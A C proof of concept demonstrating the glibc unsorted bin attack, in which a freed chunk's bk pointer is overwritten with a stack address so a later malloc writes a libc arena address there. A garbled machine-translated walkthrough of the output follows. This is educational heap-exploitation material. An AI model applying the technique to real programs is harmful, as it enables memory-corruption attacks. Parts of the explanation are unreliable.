Source
1 #include <stdio.h> 2 #include <stdlib.h> 3 4 int main(){ 5 fprintf(stderr, "This file demonstrates unsorted bin attack by write a large unsigned long value into stack\n"); 6 fprintf(stderr, "In practice, unsorted bin attack is generally prepared for further attacks, such as rewriting the " 7 "global variable global_max_fast in libc for further fastbin attack\n\n"); 8 9 unsigned long stack_var=0; 10 fprintf(stderr, "Let's first look at the target we want to rewrite on stack:\n"); 11 fprintf(stderr, "%p: %ld\n\n", &stack_var, stack_var); 12 13 unsigned long *p=malloc(400); 14 fprintf(stderr, "Now, we allocate first normal chunk on the heap at: %p\n",p); 15 fprintf(stderr, "And allocate another normal chunk in order to avoid consolidating the top chunk with" 16 "the first one during the free()\n\n"); 17 malloc(500); 18 19 free(p); 20 fprintf(stderr, "We free the first chunk now and it will be inserted in the unsorted bin with its bk pointer " 21 "point to %p\n",(void*)p[1]); 22 23 //------------VULNERABILITY----------- 24 25 p[1]=(unsigned long)(&stack_var-2); 26 fprintf(stderr, "Now emulating a vulnerability that can overwrite the victim->bk pointer\n"); 27 fprintf(stderr, "And we write it with the target address-16 (in 32-bits machine, it should be target address-8):%p\n\n",(void*)p[1]); 28 29 //------------------------------------ 30 31 malloc(400); 32 fprintf(stderr, "Let's malloc again to get the chunk we just free. During this time, the target should have already been " 33 "rewritten:\n"); 34 fprintf(stderr, "%p: %p\n", &stack_var, (void*)stack_var); 35 }
operation result
First, an application on the stack number unsigned long type var
Then the application heap p 400 bytes, then apply a stack 500, and the top chunk after the merger to prevent the release of p
Then release p, p enter unsort bin
At this time, we can see the value of p bk 0x7ffff7dd1b78
Var it to the address offset to the lower 16 bytes
In fact, the space where var as a heap fake
where var is the 8-byte data portion of the first 8 bytes fake
400 bytes of memory and then apply again, this time to allocate space freed of p
And the p-value of var bk will be referred to as modified 0x7ffff7dd1b78 (the value of which is always main_arena + 88)
Is a large unsigned long value